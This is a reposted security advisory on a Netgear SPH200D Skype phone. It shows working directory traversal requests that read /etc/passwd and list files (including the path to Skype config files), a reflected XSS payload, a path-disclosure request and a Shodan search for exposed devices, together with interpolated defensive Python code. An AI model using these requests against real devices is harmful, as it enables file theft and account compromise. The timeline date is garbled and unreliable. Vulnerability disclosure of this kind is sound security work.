Multiple Netgear SPH200D Security Vulnerabilities

Source: Internet
Author: User

Release date:
Updated on: 2013-02-02

Affected Systems:
Netgear SPH200D
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57660
 
Netgear SPH200D is a wireless Skype Network phone.
 
Netgear SPH200D firmware 1.0.4.80, and possibly other versions, is affected by a directory traversal vulnerability, a reflected cross-site scripting vulnerability, and a security bypass vulnerability. An attacker can exploit these issues to steal cookie-based authentication information, execute arbitrary script code in the context of the victim's browser, bypass security restrictions and perform unauthorized actions, and read local files and other sensitive information from the device.
 
<* Source: m-1-k-3 *>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
Device Name: SPH200D
Vendor: Netgear

============= Vulnerable Firmware Releases: ==================

Firmware Version: 1.0.4.80
Kernel Version: 4.1-18
Web Server Version 1.5

============= Device Description: ====================

http://support.netgear.com/product/SPH200D

============== Shodan Dorks ====================

Shodan Search: SPH200D
=> Results 337 devices

=========== Vulnerability Overview: ======================

* Directory traversal:

Access local files of the device. You need to be authenticated, or you have to find other methods for accessing the device.

Request:
http://192.168.178.103/../../etc/passwd

Response:
HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980 7:00:00 GMT
Pragma: no-cache
Server: simple httpd 1.0

root:x:0:0:root:/bin/bash
demo:x:5000:100:Demo User:/home/demo:/bin/bash
nobody:x:65534:65534:Nobody:/htdocs:/bin/bash

 

If you request a directory you will get a very nice directory listing for browsing through the filesystem:
/../var/

HTTP/1.0 200 OK
Content-type: text/html
Expires: Sat, 24 May 1980 7:00:00 GMT
Pragma: no-cache
Server: simple httpd 1.0

<h1>Index of ../../var/</h1>

<p><a href="/../var/.">.</a></p>
<p><a href="/../var/..">..</a></p>
<p><a href="/../var/.Skype">.Skype</a></p>
<p><a href="/../var/jffs2">jffs2</a></p>
<p><a href="/../var/htdocs">htdocs</a></p>
<p><a href="/../var/cnxt">cnxt</a></p>
<p><a href="/../var/ppp">ppp</a></p>
<p><a href="/../var/conf">conf</a></p>
<p><a href="/../var/bin">bin</a></p>
<p><a href="/../var/usr">usr</a></p>
<p><a href="/../var/tmp">tmp</a></p>

So with this information you are able to access the Skype configuration with the following request:
/../var/.Skype/<user>/config.xml

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/LFI-01.preview.png
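The root cause above is a web server that serves whatever path it is given relative to its document root without rejecting `..` segments. The following is an added example (not code from the advisory or from Netgear) of how a small httpd should resolve a request path: percent-decode first, normalise, and refuse anything that would climb out of the document root. The document root `/var/htdocs` is taken from the device's own error message; the request paths used in the test are the ones shown in the advisory.

```python
import posixpath
from urllib.parse import unquote

# Web root of the SPH200D httpd, as revealed by its own "not found" message
DOCROOT = "/var/htdocs"


def resolve_request_path(docroot, raw_path):
    """Map an HTTP request path to a file under docroot.

    Returns the resolved absolute path, or None when the request would
    escape docroot. The path is percent-decoded before normalisation so
    that encoded variants such as %2e%2e/ are treated like a literal ../.
    """
    decoded = unquote(raw_path)
    # NUL bytes and backslashes never belong in a request path on this device
    if "\x00" in decoded or "\\" in decoded:
        return None
    # Normalise relative to the root: posixpath.normpath() keeps leading ".."
    # segments of a *relative* path, which is exactly what we want to detect.
    rel = posixpath.normpath(decoded.lstrip("/"))
    if rel == ".":
        rel = ""  # request for "/" itself
    if rel == ".." or rel.startswith("../"):
        return None
    return posixpath.join(docroot, rel)


def is_traversal_attempt(raw_path):
    """Predicate suitable for logging: True when the path escapes DOCROOT."""
    return resolve_request_path(DOCROOT, raw_path) is None
```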

* Changing the password does not require the current password:

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

* Local path disclosure:

Request:
http://192.168.178.103/%3C/

Response:
The requested URL '/var/htdocs/%3C/' was not found on this server.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/local-path-disclosure.png


* Reflected Cross Site Scripting

Appending script code to the URL reveals that the input is not properly validated or encoded:
http://192.168.178.102/network-dhcp.html4f951<script>alert(1)</script>e51c012502f

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/XSSed-IE6.png
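Both the local path disclosure and the reflected XSS come from the same place: the httpd echoes the raw request path, prefixed with its filesystem document root, into an HTML error page. The block below is an added example (not code from the advisory or from Netgear) that reconstructs that behaviour from the response quoted above and places a hardened version beside it. The hardened version percent-decodes once, HTML-escapes the echoed path, and never mentions the document root; the `vulnerable_not_found` function is an assumption about how the device builds its message, based only on the text shown in this advisory.

```python
import html
from urllib.parse import unquote

DOCROOT = "/var/htdocs"  # from the device's own error message


def vulnerable_not_found(docroot, raw_path):
    """Reconstruction of the SPH200D error page: the undecoded request path is
    glued onto the filesystem root and written into HTML verbatim."""
    return ("The requested URL '%s%s' was not found on this server."
            % (docroot, raw_path))


def hardened_not_found(raw_path):
    """404 response that neither leaks the server layout nor reflects the
    request path as live HTML. Returns (status line, headers, body)."""
    # Decode once so the reader sees what was requested, then escape so that
    # < > & " ' become entities instead of markup.
    shown = html.escape(unquote(raw_path), quote=True)
    body = ("<html><body><h1>404 Not Found</h1>"
            "<p>The requested URL '%s' was not found on this server.</p>"
            "</body></html>" % shown)
    headers = [
        ("Content-Type", "text/html; charset=utf-8"),
        # stops browsers from sniffing the body into a different type
        ("X-Content-Type-Options", "nosniff"),
        ("Content-Length", str(len(body.encode("utf-8")))),
    ]
    return "HTTP/1.0 404 Not Found", headers, body


def reflects_raw_markup(body):
    """True when a response body still contains an unescaped script tag."""
    return "<script" in body.lower()
```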


=============== Solution ==================

No known solution available.

============= Credits =================

The vulnerability was discovered by Michael Messner
Mail: devnull # at # s3cur1ty # dot # de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-002
Twitter: @s3cur1ty_de

============= Time Line: ======================

August 2012 - discovered vulnerability
07.08.2012 - reported vulnerability to Netgear
08.08.2012 - case closed by Netgear
292.161.2013 - public release

================================= Advisory end ============================

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Netgear
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users of this product monitor the vendor's homepage to obtain the latest version:
 
http://support.netgear.com/product/SPH200D
